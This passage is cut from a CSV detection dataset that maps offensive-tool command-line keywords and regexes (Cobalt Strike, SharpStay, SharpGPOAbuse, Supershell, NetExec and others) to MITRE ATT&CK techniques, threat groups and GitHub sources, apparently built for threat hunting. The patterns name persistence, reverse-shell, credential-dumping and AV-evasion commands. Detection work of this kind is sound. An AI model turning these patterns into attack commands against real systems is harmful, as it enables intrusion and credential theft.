Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* 11_Credentials.py*",".{0,1000}\s11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 13_NoseyParker.py*",".{0,1000}\s13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 
17_Custom_Cracklist.py*",".{0,1000}\s17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* 2>&1 && certutil -encodehex -f * && for /F ""usebackq"" * reg add HKLM\*","\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s\-f\s.{0,1000}\s\&\&\sfor\s\/F\s\""usebackq\""\s.{0,1000}\sreg\sadd\sHKLM\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* 365-Stealer *",".{0,1000}\s365\-Stealer\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* 4444 meter",".{0,1000}\s4444\smeter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* 4444 shell",".{0,1000}\s4444\sshell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* '46993522-7D77-4B59-9B77-F82082DE9D81' *",".{0,1000}\s\'46993522\-7D77\-4B59\-9B77\-F82082DE9D81\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* -64 -format=bof *",".{0,1000}\s\-64\s\-format\=bof\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -64 -format=dll *",".{0,1000}\s\-64\s\-format\=dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -64 -format=service-dll *",".{0,1000}\s\-64\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* 9_DPAPI.py*",".{0,1000}\s9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -a 1 -f *.dll -p http*",".{0,1000}\s\-a\s1\s\-f\s.{0,1000}\.dll\s\-p\shttp.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* -a bruteforce *",".{0,1000}\s\-a\sbruteforce\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* -a nightmare*",".{0,1000}\s\-a\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* -a spoolsample*",".{0,1000}\s\-a\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sInject\'\s\-t\sdisableLeaveAlert\=true\s\-t\sdisableReconnect\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a 
C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sShell\'\s\-t\sdisableLeaveAlert\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* aad3b435b51404eeaad3b435b51404ee*",".{0,1000}\saad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* acarsd-info.nse*",".{0,1000}\sacarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* acltoolkit*",".{0,1000}\sacltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* --action exports --dll C:\Windows\System32\amsi.dll*",".{0,1000}\s\-\-action\sexports\s\-\-dll\sC\:\\Windows\\System32\\amsi\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* --action SPRAY_USERS *",".{0,1000}\s\-\-action\sSPRAY_USERS\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "* action=BackdoorLNK *",".{0,1000}\saction\=BackdoorLNK\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=CreateService servicename=* 
command=*",".{0,1000}\saction\=CreateService\sservicename\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ElevatedRegistryKey keyname=Debug keypath*",".{0,1000}\saction\=ElevatedRegistryKey\skeyname\=Debug\skeypath.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ElevatedUserInitKey command=*",".{0,1000}\saction\=ElevatedUserInitKey\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=JunctionFolder dllpath=*.dll guid=*",".{0,1000}\saction\=JunctionFolder\sdllpath\=.{0,1000}\.dll\sguid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=NewLNK filepath=*"" lnkname=*",".{0,1000}\saction\=NewLNK\sfilepath\=.{0,1000}\""\slnkname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ScheduledTask taskname=* command=*runasuser*",".{0,1000}\saction\=ScheduledTask\staskname\=.{0,1000}\scommand\=.{0,1000}runasuser.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=ScheduledTaskAction taskname=* command=*",".{0,1000}\saction\=ScheduledTaskAction\staskname\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=SchTaskCOMHijack clsid=*",".{0,1000}\saction\=SchTaskCOMHijack\sclsid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=UserRegistryKey keyname=Debug keypath=HKCU:*",".{0,1000}\saction\=UserRegistryKey\skeyname\=Debug\skeypath\=HKCU\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* action=WMIEventSub command=* eventname=*",".{0,1000}\saction\=WMIEventSub\scommand\=.{0,1000}\seventname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET 
Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "* ADAudit.ps1*",".{0,1000}\sADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "* ADCollector.exe*",".{0,1000}\sADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* --adcs --filter * --ntaccount * --enroll *",".{0,1000}\s\-\-adcs\s\-\-filter\s.{0,1000}\s\-\-ntaccount\s.{0,1000}\s\-\-enroll\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* --adcs --old-bloodhound *",".{0,1000}\s\-\-adcs\s\-\-old\-bloodhound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "* adcsync.py*",".{0,1000}\sadcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump 
hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "* add * demon.x64.exe*",".{0,1000}\sadd\s.{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#contentstrings","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "* add nc without being detected by antivirus*",".{0,1000}\sadd\snc\swithout\sbeing\sdetected\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "* addcomputer_LDAP_spn.py*",".{0,1000}\saddcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* addcomputer_with_spns.py 
*",".{0,1000}\saddcomputer_with_spns\.py\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *",".{0,1000}\s\-\-AddComputerTask\s\-\-TaskName\s.{0,1000}\s\-\-Author\s.{0,1000}\s\-\-Command\s.{0,1000}\s\-\-Arguments\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* --AddLocalAdmin --UserAccount * --GPOName *",".{0,1000}\s\-\-AddLocalAdmin\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* Add-RemoteRegBackdoor.ps1*",".{0,1000}\sAdd\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 
- TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* address-info.nse*",".{0,1000}\saddress\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --AddUserRights --UserRights * --UserAccount * --GPOName *",".{0,1000}\s\-\-AddUserRights\s\-\-UserRights\s.{0,1000}\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* --AddUserScript --ScriptName * --ScriptContents * --GPOName *",".{0,1000}\s\-\-AddUserScript\s\-\-ScriptName\s.{0,1000}\s\-\-ScriptContents\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* 
ADeleg.exe*",".{0,1000}\sADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "* --adfs-host * --krb-key * --krb-ticket *",".{0,1000}\s\-\-adfs\-host\s.{0,1000}\s\-\-krb\-key\s.{0,1000}\s\-\-krb\-ticket\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* ADFSpoof.py*",".{0,1000}\sADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & 